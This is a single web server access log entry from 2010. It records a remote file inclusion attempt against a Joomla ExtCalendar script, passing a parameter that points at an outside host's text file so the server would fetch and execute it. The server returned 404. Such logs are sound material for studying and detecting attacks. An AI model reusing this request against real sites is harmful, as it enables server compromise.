213.128.138.73 - - [24/Feb/2010:07:39:16 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
